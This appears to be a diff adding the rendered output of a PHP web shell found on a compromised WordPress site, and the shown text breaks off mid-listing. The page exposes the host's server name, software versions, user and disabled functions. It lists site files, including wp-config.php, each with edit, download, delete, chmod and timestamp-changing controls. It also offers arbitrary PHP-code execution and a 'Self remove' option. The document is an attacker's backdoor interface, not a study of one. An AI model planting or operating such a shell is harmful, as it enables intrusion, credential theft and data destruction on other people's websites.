3.0 BLOG edition</b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr> +<tr><td> +<p align="left"><b>Software:&nbsp;Apache/2.0.52 (Red Hat)</b>&nbsp;</p> +<p align="left"><b>System:&nbsp;Linux thecompanyart.com 2.6.9-42.0.3.EL.wh1smp #1 SMP Fri Aug 14 15:48:17 MDT 2009 i686</b>&nbsp;</p> +<p align="left"><b>User/Group:&nbsp;anatandannie/vuser</b>&nbsp;</p><p align="left"><b>Php version: <a href="#" onclick="document.todo.act.value='phpinfo';document.todo.submit();"><b><u>5.2.6</u></b></a> +<p align="left"><b>Php modules:&nbsp; +<font title="libxml,xsl,xmlwriter,xmlrpc,dom,xmlreader,xml,tokenizer,session,pcre,SimpleXML,SPL,PDO,sockets,soap,SQLite,standard,Reflection,pspell,posix,pgsql,pdo_sqlite,pdo_pgsql,pdo_mysql,mysqli,mysql,mssql,mhash,mcrypt,mbstring,ldap,json,imap,iconv,hash,gmp,gettext,gd,ftp,filter,exif,dbase,dba,date,curl,ctype,calendar,bz2,bcmath,zlib,openssl,apache2handler,magickwand,Zend Optimizer">mysql, mysqli, ftp, curl, imap, sockets, mssql</font></b>&nbsp;</p> +<p align="left" style="color:red"><b>Disable functions:&nbsp;passthru, proc_open, shell_exec, system</b></p><p align="left"><b>Install program:&nbsp;<font color="#00CCFF"><font title="/usr/bin/php">php</font>, <font title="/usr/bin/perl">perl</font>, <font title="/usr/bin/make">make</font>, <font title="/bin/tar">tar</font>, <font title="/usr/bin/wget">wget</font>, <font title="/usr/bin/lynx">lynx</font>, <font title="/usr/bin/curl">curl</font>, <font title="/usr/bin/lwp-mirror">lwp-mirror</font>, <font title="/usr/bin/lwp-download">lwp-download</font></font></b></p><p align="left"><b>Allow_url_fopen:&nbsp;<font color="green">ON</font></b></p> +<p align="left"><b>Allow_url_include:&nbsp;<font color="red">OFF</font></b></p> +<p align="left"><b>Safe-mode:&nbsp;<font color=green>OFF (not secure)</font></b></p> +<p><font color=red>Wordpress Not Found! 
<input type=text id="wp_pat"><input type="submit" value="SET PATH" onclick="document.todo.act.value='ls';document.todo.wp_path.value=document.getElementById('wp_pat').value;document.todo.submit();"></p><p align="left"><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2F';document.todo.sort.value='0a';document.todo.submit();"><b>/</b></a><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2F';document.todo.sort.value='0a';document.todo.submit();"><b>var/</b></a><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2F';document.todo.sort.value='0a';document.todo.submit();"><b>www/</b></a><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2F';document.todo.sort.value='0a';document.todo.submit();"><b>html/</b></a><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.sort.value='0a';document.todo.submit();"><b>wordpress/</b></a>&nbsp;&nbsp;&nbsp;<b><font color=green>drwxr-xr-x</font></b><br><a href="#" onclick="document.todo.act.value='search';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.submit();"><b><hr>Search</b></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="#" onclick="document.todo.act.value='eval';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.submit();"><b>PHP-code</b></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="#" onclick="document.todo.act.value='selfremove';document.todo.submit();"><b>Self remove</b></a>&nbsp;&nbsp;&nbsp;&nbsp;</p></td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><center><b>Listing folder (28 files and 4 folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form method=POST 
name="ls_form"><input type=hidden name=act value=ls><input type=hidden name=d value=/var/www/html/wordpress/><tr> +<td><b>Name</b><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.sort.value='0d;document.todo.submit();"></td> +<td><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.sort.value='1a';document.todo.submit();"><b>Size</b></a></td> +<td><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.sort.value='2a';document.todo.submit();"><b>Modify</b></a></td> +<td><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.sort.value='3a';document.todo.submit();"><b>Owner/Group</b></a></td> +<td><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2F';document.todo.sort.value='4a';document.todo.submit();"><b>Perms</b></a></td> +<td><b>Action</b></td> +</tr> +<tr> +<td><a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml';document.todo.sort.value='0a';document.todo.submit();">..</a></td> +<td>LINK</td> +<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='..';document.todo.submit();">11.10.2009 12:14:52</a></td> +<td>anatandannie/vuser</td> +<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='..';document.todo.submit();"><b><font color=green>drwxr-xr-x</font></b></a></td> +<td><input type="checkbox" name="actbox[]" id="actbox0" value="/var/www/html/wordpress/.."></td> +</tr> +<tr> +<td><a href="#" 
onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.sort.value='0a';document.todo.submit();">.</a></td>
+<td>LINK</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='.';document.todo.submit();">14.01.2010 11:48:42</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='.';document.todo.submit();"><b><font color=green>drwxr-xr-x</font></b></a></td>
+<td><input type="checkbox" name="actbox[]" onclick="ls_reverse_all();"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fwp-admin';document.todo.sort.value='0a';document.todo.submit();">[wp-admin]</a></td>
+<td>DIR</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-admin';document.todo.submit();">21.07.2009 01:20:14</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-admin';document.todo.submit();"><b><font color=green>drwxr-xr-x</font></b></a></td>
+<td><input type="checkbox" name="actbox[]" id="actbox1" value="/var/www/html/wordpress/wp-admin"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fwp-content';document.todo.sort.value='0a';document.todo.submit();">[wp-content]</a></td>
+<td>DIR</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-content';document.todo.submit();">14.01.2010 10:59:59</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" 
onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-content';document.todo.submit();"><b><font color=green>drwxr-xr-x</font></b></a></td>
+<td><input type="checkbox" name="actbox[]" id="actbox2" value="/var/www/html/wordpress/wp-content"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fwp-content-new';document.todo.sort.value='0a';document.todo.submit();">[wp-content-new]</a></td>
+<td>DIR</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-content-new';document.todo.submit();">05.02.2009 18:09:15</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-content-new';document.todo.submit();"><b><font color=green>drwxr-xr-x</font></b></a></td>
+<td><input type="checkbox" name="actbox[]" id="actbox3" value="/var/www/html/wordpress/wp-content-new"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='ls';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress%2Fwp-includes';document.todo.sort.value='0a';document.todo.submit();">[wp-includes]</a></td>
+<td>DIR</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-includes';document.todo.submit();">27.11.2009 23:30:49</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-includes';document.todo.submit();"><b><font color=green>drwxr-xr-x</font></b></a></td>
+<td><input type="checkbox" name="actbox[]" id="actbox4" value="/var/www/html/wordpress/wp-includes"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" 
onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='.htaccess';document.todo.submit();">.htaccess</a></td>
+<td>301 B</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='.htaccess';document.todo.submit();">01.09.2009 09:30:43</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='.htaccess';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='.htaccess';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='.htaccess';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='.htaccess';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox5" value="/var/www/html/wordpress/.htaccess"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='clear.js';document.todo.submit();">clear.js</a></td>
+<td>1.02 KB</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='clear.js';document.todo.submit();">12.01.2010 03:48:34</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" 
onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='clear.js';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='clear.js';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='clear.js';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='clear.js';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox6" value="/var/www/html/wordpress/clear.js"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='index.php';document.todo.submit();">index.php</a></td>
+<td>397 B</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='index.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='index.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='index.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" 
onclick="document.todo.act.value='f';document.todo.f.value='index.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='index.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox7" value="/var/www/html/wordpress/index.php"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='license.txt';document.todo.submit();">license.txt</a></td>
+<td>15.05 KB</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='license.txt';document.todo.submit();">04.11.2009 16:49:41</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='license.txt';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='license.txt';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='license.txt';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='license.txt';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox8" value="/var/www/html/wordpress/license.txt"></td>
+</tr>
+<tr> 
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='readme.html';document.todo.submit();">readme.html</a></td>
+<td>7.46 KB</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='readme.html';document.todo.submit();">04.11.2009 16:49:40</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='readme.html';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='readme.html';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='readme.html';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='readme.html';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox9" value="/var/www/html/wordpress/readme.html"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-app.php';document.todo.submit();">wp-app.php</a></td>
+<td>39.82 KB</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-app.php';document.todo.submit();">04.11.2009 16:49:39</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" 
onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-app.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-app.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-app.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-app.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox10" value="/var/www/html/wordpress/wp-app.php"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-atom.php';document.todo.submit();">wp-atom.php</a></td>
+<td>541 B</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-atom.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-atom.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-atom.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" 
onclick="document.todo.act.value='f';document.todo.f.value='wp-atom.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-atom.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox11" value="/var/www/html/wordpress/wp-atom.php"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-blog-header.php';document.todo.submit();">wp-blog-header.php</a></td>
+<td>293 B</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-blog-header.php';document.todo.submit();">27.11.2009 23:27:51</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-blog-header.php';document.todo.submit();"><b><font color=green>-rwxr-xr-x</font></b></a></td>
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-blog-header.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-blog-header.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-blog-header.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox12" 
value="/var/www/html/wordpress/wp-blog-header.php"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-comments-post.php';document.todo.submit();">wp-comments-post.php</a></td>
+<td>3.56 KB</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-comments-post.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-comments-post.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-comments-post.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-comments-post.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-comments-post.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox13" value="/var/www/html/wordpress/wp-comments-post.php"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-commentsrss2.php';document.todo.submit();">wp-commentsrss2.php</a></td>
+<td>238 B</td>
+<td><a href="#" 
onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-commentsrss2.php';document.todo.submit();">04.11.2009 16:49:39</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-commentsrss2.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-commentsrss2.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-commentsrss2.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-commentsrss2.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox14" value="/var/www/html/wordpress/wp-commentsrss2.php"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-config-sample.php';document.todo.submit();">wp-config-sample.php</a></td>
+<td>2.56 KB</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-config-sample.php';document.todo.submit();">04.11.2009 16:49:40</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-config-sample.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td> 
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-config-sample.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-config-sample.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-config-sample.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox15" value="/var/www/html/wordpress/wp-config-sample.php"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-config.php';document.todo.submit();">wp-config.php</a></td>
+<td>1.21 KB</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-config.php';document.todo.submit();">27.11.2009 23:08:37</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-config.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-config.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-config.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" 
onclick="document.todo.act.value='delete';document.todo.f.value='wp-config.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox16" value="/var/www/html/wordpress/wp-config.php"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.ft.value='edit';document.todo.f.value='wp-cron.php';document.todo.submit();">wp-cron.php</a></td>
+<td>1.22 KB</td>
+<td><a href="#" onclick="document.todo.act.value='touch';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-cron.php';document.todo.submit();">04.11.2009 16:49:41</a></td>
+<td>anatandannie/vuser</td>
+<td>&nbsp;<a href="#" onclick="document.todo.act.value='chmod';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.f.value='wp-cron.php';document.todo.submit();"><b><font color=green>-rw-r--r--</font></b></a></td>
+<td><a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-cron.php';document.todo.ft.value='edit';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">E</a>&nbsp;<a href="#" onclick="document.todo.act.value='f';document.todo.f.value='wp-cron.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">D</a>&nbsp;<a href="#" onclick="document.todo.act.value='delete';document.todo.f.value='wp-cron.php';document.todo.ft.value='download';document.todo.d.value='%2Fvar%2Fwww%2Fhtml%2Fwordpress';document.todo.submit();">X</a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox17" value="/var/www/html/wordpress/wp-cron.php"></td>
+</tr>
+<tr>
+<td>&nbsp;<a href="#" 
